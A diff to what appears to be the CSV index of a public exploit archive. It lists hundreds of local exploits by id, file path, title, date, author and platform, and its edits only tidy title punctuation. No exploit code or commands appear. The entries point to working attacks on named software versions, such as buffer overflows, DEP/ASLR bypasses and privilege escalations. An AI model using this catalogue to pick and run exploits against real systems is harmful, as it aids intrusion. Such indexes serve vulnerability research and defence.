Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0 11208,platforms/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic - '.m3u' Stack Overflow",2010-01-21,cr4wl3r,windows,local,0 @@ -6748,7 +6749,7 @@ id,file,description,date,author,platform,type,port 11333,platforms/windows/local/11333.pl,"FoxPlayer 1.7.0 - '.m3u' Local Buffer Overflow",2010-02-05,cr4wl3r,windows,local,0 11364,platforms/multiple/local/11364.txt,"LDAP - Injection (PoC)",2010-02-09,mc2_s3lector,multiple,local,0 11372,platforms/windows/local/11372.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow",2010-02-09,"fl0 fl0w",windows,local,0 -11379,platforms/windows/local/11379.c,"feedDemon 3.1.0.9 - opml File Buffer Overflow",2010-02-09,"fl0 fl0w",windows,local,0 +11379,platforms/windows/local/11379.c,"feedDemon 3.1.0.9 - '.opml' File Buffer Overflow",2010-02-09,"fl0 fl0w",windows,local,0 11384,platforms/windows/local/11384.py,"WM Downloader 3.0.0.9 (Windows XP SP3) - PLS PLA Exploit",2010-02-10,"Beenu Arora",windows,local,0 11400,platforms/windows/local/11400.py,"RadASM 2.2.1.6 - '.rap' Universal Buffer Overflow",2010-02-11,Dz_attacker,windows,local,0 11408,platforms/win_x86/local/11408.c,"RadASM - '.rap' file Local Buffer Overflow",2010-02-11,"fl0 fl0w",win_x86,local,0 @@ -6836,7 +6837,7 @@ id,file,description,date,author,platform,type,port 13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0 13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0 13905,platforms/windows/local/13905.py,"BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overflow (PoC) (ASLR + DEP Bypass)",2010-06-17,mr_me,windows,local,0 -13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow (EIP + SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0 +13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow (EIP + SEH) (DEP Bypass)",2010-06-17,TecR0c,windows,local,0 13909,platforms/windows/local/13909.py,"Batch Audio Converter Lite Edition 1.0.0.0 - Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local,0 13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)",2010-06-19,Crazy_Hacker,windows,local,0 13942,platforms/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)",2010-06-20,Madjix,windows,local,0 @@ -6848,25 +6849,25 @@ id,file,description,date,author,platform,type,port 14068,platforms/windows/local/14068.py,"Winamp 5.572 (Windows 7) - Local Buffer Overflow (ASLR + DEP Bypass)",2010-06-26,Node,windows,local,0 14077,platforms/windows/local/14077.rb,"BlazeDVD 6.0 - Buffer Overflow (Metasploit)",2010-06-27,blake,windows,local,0 14081,platforms/windows/local/14081.pl,"RM Downloader 3.1.3 - Buffer Overflow (SEH)",2010-06-27,Madjix,windows,local,0 -14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local Buffer Overflow (SEH)",2010-06-28,chap0,windows,local,0 +14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - '.sms' File Local Buffer Overflow (SEH)",2010-06-28,chap0,windows,local,0 14150,platforms/windows/local/14150.pl,"RM Downloader 3.1.3 (Windows 7) - Local ASLR + DEP Bypass (SEH)",2010-07-01,Node,windows,local,0 14153,platforms/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,Madjix,windows,local,0 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0 14215,platforms/windows/local/14215.txt,"SasCam 2.7 - ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local,0 14256,platforms/windows/local/14256.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 -14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit (Direct RET)",2010-07-07,chap0,windows,local,0 +14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Direct RET Local Exploit",2010-07-07,chap0,windows,local,0 14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0 14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - Multiple OS ASLR + DEP Bypass (SEH) (Metasploit)",2010-07-13,Node,windows,local,0 14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow (MS10-038)",2010-07-14,webDEViL,windows,local,0 14373,platforms/win_x86/local/14373.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Stack Buffer Overflow Universal",2010-07-16,Madjix,win_x86,local,0 14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0 -14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0 +14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic .LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0 14406,platforms/bsd/local/14406.pl,"Ghostscript - '.PostScript' File Stack Overflow",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0 14428,platforms/windows/local/14428.py,"QQPlayer - '.asx' File Processing Buffer Overflow",2010-07-21,"Li Qingshan",windows,local,0 14431,platforms/windows/local/14431.py,"QQPlayer - '.cue' File Buffer Overflow",2010-07-21,"Lufeng Li",windows,local,0 14433,platforms/windows/local/14433.pl,"ZipCentral - '.zip' Buffer Overflow (SEH)",2010-07-21,"Jiten Pathy",windows,local,0 14464,platforms/windows/local/14464.pl,"Mediacoder 0.7.3.4682 - '.m3u' Universal Buffer Overflow",2010-07-24,s-dz,windows,local,0 -14482,platforms/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - smi File Buffer Overflow",2010-07-27,"Lufeng Li",windows,local,0 +14482,platforms/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - '.smi' File Buffer Overflow",2010-07-27,"Lufeng Li",windows,local,0 14491,platforms/windows/local/14491.txt,"Zemana AntiLogger 'AntiLog32.sys' 1.5.2.755 - Privilege Escalation",2010-07-28,th_decoder,windows,local,0 14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0 14503,platforms/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Buffer Overflow (SEH)",2010-07-29,Madjix,windows,local,0 @@ -6890,7 +6891,7 @@ id,file,description,date,author,platform,type,port 14681,platforms/windows/local/14681.py,"A-PDF WAV to MP3 1.0.0 - Universal Local (SEH)",2010-08-18,Dr_IDE,windows,local,0 14688,platforms/freebsd/local/14688.c,"FreeBSD - 'mbufs()' sendfile Cache Poisoning Privilege Escalation",2010-08-19,kingcope,freebsd,local,0 14693,platforms/windows/local/14693.py,"Microsoft Word - Record Parsing Buffer Overflow (MS09-027)",2010-08-20,anonymous,windows,local,0 -14706,platforms/windows/local/14706.py,"Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0 +14706,platforms/windows/local/14706.py,"Microsoft Excel - FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0 14720,platforms/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Buffer Overflow",2010-08-23,"James Fitts",windows,local,0 14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0 14723,platforms/windows/local/14723.c,"Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0 @@ -6972,7 +6973,7 @@ id,file,description,date,author,platform,type,port 15155,platforms/linux/local/15155.c,"XFS - Deleted Inode Local Information Disclosure",2010-09-29,"Red Hat",linux,local,0 15156,platforms/windows/local/15156.py,"Quick Player 1.3 - Unicode (SEH)",2010-09-29,"Abhishek Lyall",windows,local,0 15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 - SafeSEH + SEHOP Exploit",2010-10-02,x90c,windows,local,0 -15201,platforms/windows/local/15201.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH DEP Bypass)",2010-10-04,"Muhamad Fadzil Ramli",windows,local,0 +15201,platforms/windows/local/15201.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH) (DEP Bypass)",2010-10-04,"Muhamad Fadzil Ramli",windows,local,0 15206,platforms/bsd/local/15206.c,"FreeBSD - 'pseudofs' Null Pointer Dereference Privilege Escalation",2010-10-04,"Babcia Padlina",bsd,local,0 15285,platforms/linux/local/15285.c,"Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - '.m3u' Buffer Overflow",2010-11-23,0v3r,windows,local,0 @@ -7000,7 +7001,7 @@ id,file,description,date,author,platform,type,port 15541,platforms/windows/local/15541.pl,"Realtek HD Audio Control Panel 2.1.3.2 - Exploit",2010-11-14,BraniX,windows,local,0 15542,platforms/windows/local/15542.py,"Foxit Reader 4.1.1 - Stack Overflow (Egghunter)",2010-11-15,dookie,windows,local,0 15566,platforms/windows/local/15566.rb,"DIZzy 1.12 - Local Stack Overflow",2010-11-18,g30rg3_x,windows,local,0 -15569,platforms/windows/local/15569.rb,"MP3-Nator - Buffer Overflow (SEH DEP Bypass)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0 +15569,platforms/windows/local/15569.rb,"MP3-Nator - Buffer Overflow (SEH) (DEP Bypass)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0 15575,platforms/windows/local/15575.py,"MiniShare 1.5.5 - 'users.txt' Buffer Overflow (Egghunter)",2010-11-19,0v3r,windows,local,0 15584,platforms/windows/local/15584.txt,"Native Instruments Service Center 2.2.5 - Privilege Escalation",2010-11-20,LiquidWorm,windows,local,0 15589,platforms/windows/local/15589.wsf,"Microsoft Windows - Task Scheduler Privilege Escalation",2010-11-20,webDEViL,windows,local,0 @@ -7176,7 +7177,7 @@ id,file,description,date,author,platform,type,port 17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' File Buffer Overflow (SEH Unicode) (Metasploit)",2011-04-28,Metasploit,windows,local,0 17229,platforms/windows/local/17229.rb,"MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 - '.s3m' Stack Buffer Overflow (Metasploit)",2011-04-30,Metasploit,windows,local,0 17230,platforms/windows/local/17230.rb,"MJM Core Player 2011 - '.s3m' Stack Buffer Overflow (Metasploit)",2011-04-30,Metasploit,windows,local,0 -17317,platforms/windows/local/17317.rb,"VisiWave - VWR File Parsing Trusted Pointer (Metasploit)",2011-05-23,Metasploit,windows,local,0 +17317,platforms/windows/local/17317.rb,"VisiWave - '.VWR' File Parsing Trusted Pointer (Metasploit)",2011-05-23,Metasploit,windows,local,0 17318,platforms/multiple/local/17318.php,"PHP 5.3.5 - 'socket_connect()' Buffer Overflow",2011-05-25,"Marek Kroemeke",multiple,local,0 17270,platforms/windows/local/17270.pl,"Chasys Media Player 2.0 - Buffer Overflow (SEH)",2011-05-11,h1ch4m,windows,local,0 17277,platforms/windows/local/17277.pl,"A-PDF Wav to MP3 Converter 1.2.0 - DEP Bypass",2011-05-13,h1ch4m,windows,local,0 @@ -7216,7 +7217,7 @@ id,file,description,date,author,platform,type,port 17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass",2011-08-10,"C4SS!0 G0M3S",windows,local,0 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass",2011-08-11,"C4SS!0 G0M3S",windows,local,0 17665,platforms/windows/local/17665.pl,"D.R. Software Audio Converter 8.1 - DEP Bypass",2011-08-13,"C4SS!0 G0M3S",windows,local,0 -17715,platforms/windows/local/17715.html,"F-Secure (Multiple Products) - ActiveX Overwrite (SEH) (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0 +17715,platforms/windows/local/17715.html,"F-Secure (Multiple Products) - ActiveX HeapSpray Overwrite (SEH)",2011-08-24,41.w4r10r,windows,local,0 17727,platforms/windows/local/17727.txt,"Free MP3 CD Ripper 1.1 - Local Buffer Overflow",2011-08-27,X-h4ck,windows,local,0 17732,platforms/windows/local/17732.py,"Free MP3 CD Ripper 1.1 - DEP Bypass",2011-08-27,"C4SS!0 G0M3S",windows,local,0 17735,platforms/windows/local/17735.pl,"Yahoo! player 1.5 - '.m3u' Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",windows,local,0 @@ -7282,7 +7283,7 @@ id,file,description,date,author,platform,type,port 18366,platforms/windows/local/18366.rb,"Adobe Reader - U3D Memory Corruption (Metasploit)",2012-01-14,Metasploit,windows,local,0 18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Privilege Escalation (1)",2012-01-23,zx2c4,linux,local,0 18471,platforms/windows/local/18471.c,"TORCS 1.3.2 - '.xml' File Buffer Overflow /SafeSEH Evasion",2012-02-08,"Andres Gomez & David Mora",windows,local,0 -18500,platforms/windows/local/18500.py,"Blade API Monitor - Unicode Bypass (Serial Number) Buffer Overflow",2012-02-20,b33f,windows,local,0 +18500,platforms/windows/local/18500.py,"Blade API Monitor - Unicode Bypass Serial Number Buffer Overflow",2012-02-20,b33f,windows,local,0 18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - Exploit (SEH) (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0 18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow (Metasploit)",2012-02-23,Metasploit,windows,local,0 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Stack Buffer Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0 @@ -7321,14 +7322,14 @@ id,file,description,date,author,platform,type,port 18959,platforms/multiple/local/18959.txt,"Browsers Browsers - Navigation Download Trick",2012-05-31,"Michal Zalewski",multiple,local,0 19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Exploit",2012-06-07,b33f,windows,local,0 19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005) (Metasploit)",2012-06-11,Metasploit,windows,local,0 -19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE Exploit",1996-04-05,"Arthur Hagen",irix,local,0 -19067,platforms/irix/local/19067.txt,"SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - LICENSEMGR_FILE_ROOT Exploit",1996-11-22,"Yuri Volobuev",irix,local,0 +19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - 'NETLS_LICENSE_FILE' Exploit",1996-04-05,"Arthur Hagen",irix,local,0 +19067,platforms/irix/local/19067.txt,"SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - 'LICENSEMGR_FILE_ROOT' Exploit",1996-11-22,"Yuri Volobuev",irix,local,0 19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D - SUID/SGID Core File",1998-04-06,"ru5ty & SoReN",unix,local,0 -19070,platforms/linux/local/19070.txt,"Slackware Linux 3.4 - liloconfig-color Temporary file",1998-04-06,neonhaze,linux,local,0 -19071,platforms/linux/local/19071.txt,"Slackware Linux 3.4 - makebootdisk Temporary file",1998-04-06,neonhaze,linux,local,0 +19070,platforms/linux/local/19070.txt,"Slackware Linux 3.4 - 'liloconfig-color' Temporary file",1998-04-06,neonhaze,linux,local,0 +19071,platforms/linux/local/19071.txt,"Slackware Linux 3.4 - 'makebootdisk' Temporary file",1998-04-06,neonhaze,linux,local,0 19072,platforms/linux/local/19072.txt,"ISC BIND 4.9.7 -T1B - named SIGINT and SIGIOT Symlink Exploit",1998-04-10,"Joe H",linux,local,0 -19073,platforms/linux/local/19073.txt,"Slackware Linux 3.4 - netconfig Temporary file",1998-04-06,neonhaze,linux,local,0 -19074,platforms/linux/local/19074.txt,"Slackware Linux 3.4 - pkgtool Temporary file",1998-04-06,neonhaze,linux,local,0 +19073,platforms/linux/local/19073.txt,"Slackware Linux 3.4 - 'netconfig' Temporary file",1998-04-06,neonhaze,linux,local,0 +19074,platforms/linux/local/19074.txt,"Slackware Linux 3.4 - 'pkgtool' Temporary file",1998-04-06,neonhaze,linux,local,0 19077,platforms/linux/local/19077.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow (1)",1998-05-05,jamez,linux,local,0 19078,platforms/linux/local/19078.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow (2)",1998-05-05,pr10n,linux,local,0 19095,platforms/linux/local/19095.txt,"GNU GNU bash 1.14 - Path Embedded Code Execution",1999-04-20,Shadow,linux,local,0 @@ -7377,7 +7378,7 @@ id,file,description,date,author,platform,type,port 19217,platforms/aix/local/19217.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (5)",1999-05-22,UNYUN,aix,local,0 19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Exploit",1998-05-19,"Matt Chapman",windows,local,0 19227,platforms/windows/local/19227.txt,"IBM Remote Control Software 1.0 - Exploit",1999-05-10,"Thomas Krug",windows,local,0 -19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation Vulnerabilities",1999-05-25,"Paul Cammidge",aix,local,0 +19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation",1999-05-25,"Paul Cammidge",aix,local,0 19232,platforms/solaris/local/19232.txt,"SunOS 4.1.4 - arp(8c) Memory Dump",1994-02-01,anonymous,solaris,local,0 19233,platforms/solaris/local/19233.txt,"Solaris 7.0 - aspppd Insecure Temporary File Creation",1996-12-20,Al-Herbish,solaris,local,0 19234,platforms/solaris/local/19234.c,"Solaris 7.0 - 'cancel' Exploit",1999-03-05,"Josh A. Strickland",solaris,local,0 @@ -7419,7 +7420,7 @@ id,file,description,date,author,platform,type,port 19302,platforms/linux/local/19302.c,"Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH",1998-01-19,Solar,linux,local,0 19304,platforms/irix/local/19304.txt,"SGI IRIX 6.4 inpview - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0 19305,platforms/linux/local/19305.c,"RedHat Linux 5.0 msgchk - Exploit",1998-01-19,"Cesar Tascon Alvarez",linux,local,0 -19306,platforms/aix/local/19306.c,"IBM AIX 4.2.1 portmir - Buffer Overflow / Insecure Temporary File Creation Vulnerabilities",1997-10-29,"BM ERS Team",aix,local,0 +19306,platforms/aix/local/19306.c,"IBM AIX 4.2.1 portmir - Buffer Overflow / Insecure Temporary File Creation",1997-10-29,"BM ERS Team",aix,local,0 19307,platforms/aix/local/19307.c,"IBM AIX 4.2 ping - Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 19309,platforms/aix/local/19309.c,"IBM AIX 4.2 lchangelv - Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 19310,platforms/irix/local/19310.c,"SGI IRIX 6.4 - login Exploit",1997-05-26,"David Hedley",irix,local,0 @@ -7468,9 +7469,9 @@ id,file,description,date,author,platform,type,port 19427,platforms/osx/local/19427.txt,"Apple At Ease 5.0 - Exploit",1999-05-13,"Tim Conrad",osx,local,0 19428,platforms/linux/local/19428.c,"Samba < 2.0.5 - Exploit",1999-07-21,"Gerald Britton",linux,local,0 19429,platforms/linux/local/19429.sh,"Rational Software ClearCase for Unix 3.2 - ClearCase SUID",1999-05-02,Mudge,linux,local,0 -19430,platforms/multiple/local/19430.txt,"GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage Vulnerabilities",1999-07-25,"Pawel Wilk",multiple,local,0 +19430,platforms/multiple/local/19430.txt,"GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage",1999-07-25,"Pawel Wilk",multiple,local,0 19433,platforms/windows/local/19433.rb,"Apple QuickTime - TeXML Stack Buffer Overflow (Metasploit)",2012-06-28,Metasploit,windows,local,0 -19434,platforms/osx/local/19434.txt,"Quinn - 'the Eskimo' and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption",1999-07-28,"Dawid adix Adamski",osx,local,0 +19434,platforms/osx/local/19434.txt,"Quinn - 'the Eskimo' and Peter N. Lewis Internet Configuration 1.0/2.0 Weak Password Encryption",1999-07-28,"Dawid adix Adamski",osx,local,0 19437,platforms/osx/local/19437.txt,"ELS Screen to Screen 1.0 - Multiple Password Vulnerabilities",1999-07-29,"Prozaq of mSec",osx,local,0 19438,platforms/osx/local/19438.txt,"Ogopogo Autothenticate 1.1.5 - Weak Password Encryption",1999-07-29,"Prozaq of mSec",osx,local,0 19439,platforms/osx/local/19439.txt,"Power On Software On Guard for MacOS 3.2 - Emergency Password",1999-07-29,"Prozaq of mSec",osx,local,0 @@ -7496,7 +7497,7 @@ id,file,description,date,author,platform,type,port 19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 / SunOS 4.1.4 - Buffer Overflow",1999-09-13,"Job de Haas of ITSX",linux,local,0 19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN Privilege Escalation",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0 19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 - GECOS Buffer Overflow",1999-09-21,"babcia padlina ltd",freebsd,local,0 -19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3 / Microsoft Windows NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix - Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0 +19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3 / Microsoft Windows NT 4.0/SP1-6 JET/ODBC Patch / RDS Fix - Registry Key",1999-09-21,.rain.forest.puppy,windows,local,0 19508,platforms/linux/local/19508.sh,"S.u.S.E. Linux 6.2 sscw - HOME Environment Variable Buffer Overflow",1999-09-23,"Brock Tellier",linux,local,0 19509,platforms/solaris/local/19509.sh,"Solaris 2.6 - Profiling File Creation",1999-09-22,"Steve Mynott",solaris,local,0 19510,platforms/linux/local/19510.pl,"SSH Communications Security SSH 1.2.27 - Authentication Socket File Creation",1999-09-17,"Tymm Twillman",linux,local,0 @@ -7600,7 +7601,7 @@ id,file,description,date,author,platform,type,port 19813,platforms/linux/local/19813.txt,"Halloween Linux 4.0 / S.u.S.E. Linux 6.0/6.1/6.2/6.3 - kreatecd Exploit",2000-03-16,Sebastian,linux,local,0 19816,platforms/linux/local/19816.txt,"gpm 1.18.1/1.19 / Debian 2.x / RedHat 6.x / S.u.S.E 5.3/6.x - gpm Setgid",2000-03-22,"Egmont Koblinger",linux,local,0 19821,platforms/multiple/local/19821.c,"Citrix Metaframe 1.0/1.8 - Weak Encryption",2000-03-29,"Dug Song",multiple,local,0 -19823,platforms/unix/local/19823.txt,"Standard & Poors ComStock 4.2.4 - Machine Vulnerabilities",2000-03-24,kadokev,unix,local,0 +19823,platforms/unix/local/19823.txt,"Standard & Poors ComStock 4.2.4 - Exploit",2000-03-24,kadokev,unix,local,0 19836,platforms/windows/local/19836.c,"Symantec pcAnywhere 9.0 - Weak Encryption",2000-04-06,"Pascal Longpre",windows,local,0 19837,platforms/linux/local/19837.c,"Bray Systems Linux Trustees 1.5 - Long Pathname",2000-04-10,"Andrey E. Lerman",linux,local,0 19838,platforms/linux/local/19838.c,"CRYPTOCard CRYPTOAdmin 4.1 - Weak Encryption (1)",2000-04-10,kingpin,linux,local,0 @@ -7649,7 +7650,7 @@ id,file,description,date,author,platform,type,port 19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0 20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Sendmail Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",linux,local,0 20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Sendmail 8.10.1 Capabilities Privilege Escalation (2)",2000-06-07,"Wojciech Purczynski",linux,local,0 -20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 - SNMPD File Permission Vulnerabilities",2000-06-07,loveyou,hp-ux,local,0 +20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 - '.SNMPD' File Permission",2000-06-07,loveyou,hp-ux,local,0 20003,platforms/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 - Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",solaris,local,0 20004,platforms/linux/local/20004.c,"Stelian Pop dump 0.4 - restore Buffer Overflow",2000-06-07,"Stan Bubrouski",linux,local,0 20012,platforms/windows/local/20012.txt,"Computer Associates eTrust Intrusion Detection 1.4.1.13 - Weak Encryption",2000-06-07,Phate.net,windows,local,0 @@ -7721,7 +7722,7 @@ id,file,description,date,author,platform,type,port 20290,platforms/aix/local/20290.txt,"AIX 3.x - bugfiler Arbitrary File Creation",1997-09-08,"Johannes Schwabe",aix,local,0 20291,platforms/linux/local/20291.sh,"Elm 2.4 - 'filter' Arbitrary Mail Disclosure",1995-12-26,"David J Meltzer",linux,local,0 20294,platforms/unix/local/20294.txt,"XFree86 3.3.5/3.3.6 - Xlib Display Buffer Overflow",2000-10-12,"Michal Zalewski",unix,local,0 -20296,platforms/windows/local/20296.rb,"CoolPlayer+ Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (Large Shellcode)",2012-08-06,"Robert Larsen",windows,local,0 +20296,platforms/windows/local/20296.rb,"CoolPlayer+ Portable 2.19.2 - Buffer Overflow (ASLR Bypass)",2012-08-06,"Robert Larsen",windows,local,0 40428,platforms/windows/local/40428.txt,"Macro Expert 4.0 - Multiple Privilege Escalations",2016-09-26,Tulpa,windows,local,0 20312,platforms/linux/local/20312.c,"Oracle Internet Directory 2.0.6 - oidldap Exploit",2000-10-18,"Juan Manuel Pascual Escribá",linux,local,0 20316,platforms/linux/local/20316.txt,"BSD 'lpr' 0.54 -4 - Arbitrary Command Execution",2000-10-20,"zenith parsec",linux,local,0 @@ -7805,10 +7806,10 @@ id,file,description,date,author,platform,type,port 20769,platforms/unix/local/20769.txt,"Siemens Reliant UNIX 5.4 - ppd -T Race Condition",2001-04-14,"Ruiz Garcia",unix,local,0 20772,platforms/solaris/local/20772.c,"Solaris 2.5/2.6/7.0/8 - 'mailx -F' Buffer Overflow (1)",2001-04-01,"Pablo Sor",solaris,local,0 20773,platforms/solaris/local/20773.c,"Solaris 2.5/2.6/7.0/8 - 'mailx -F' Buffer Overflow (2)",2001-04-15,"Pablo Sor",solaris,local,0 -20776,platforms/linux/local/20776.c,"Samba 2.0.x - Insecure TMP file Symbolic Link",2001-04-17,"Gabriel Maggiotti",linux,local,0 +20776,platforms/linux/local/20776.c,"Samba 2.0.x - Insecure TMP File Symbolic Link",2001-04-17,"Gabriel Maggiotti",linux,local,0 20777,platforms/linux/local/20777.c,"ISC INN 2.x - Command-Line Buffer Overflow (1)",2001-04-18,"Enrique A.",linux,local,0 20778,platforms/linux/local/20778.sh,"ISC INN 2.x - Command-Line Buffer Overflow (2)",2001-04-18,"Enrique A.",linux,local,0 -20781,platforms/linux/local/20781.txt,"SuSE 7.0 - KFM Insecure TMP File Creation",2001-04-18,"Paul Starzetz",linux,local,0 +20781,platforms/linux/local/20781.txt,"SuSE 7.0 - KFM Insecure '.TMP' File Creation",2001-04-18,"Paul Starzetz",linux,local,0 20795,platforms/linux/local/20795.sh,"Sendfile 1.x/2.1 - Local Privileged Arbitrary Command Execution",2001-04-24,psheep,linux,local,0 20798,platforms/linux/local/20798.sh,"Sendfile 1.x/2.1 - Forced Privilege Lowering Failure",2001-04-24,"Cade Cairns",linux,local,0 20804,platforms/irix/local/20804.c,"IRIX 5.3/6.x - 'netprint' Arbitrary Shared Library Usage",2001-04-26,V9,irix,local,0 @@ -7947,7 +7948,7 @@ id,file,description,date,author,platform,type,port 21489,platforms/sco/local/21489.txt,"Caldera OpenServer 5.0.5/5.0.6 - SCOAdmin Symbolic Link",2002-05-29,"Kevin Finisterre",sco,local,0 21496,platforms/linux/local/21496.c,"IBM Informix SE 7.25 sqlexec - Buffer Overflow (1)",2002-05-30,smurf,linux,local,0 21497,platforms/linux/local/21497.pl,"IBM Informix SE 7.25 sqlexec - Buffer Overflow (2)",2002-05-30,pHrail,linux,local,0 -21499,platforms/linux/local/21499.txt,"QNX RTOS 4.25 - CRTTrap File Disclosure",2002-05-31,"Simon Ouellette",linux,local,0 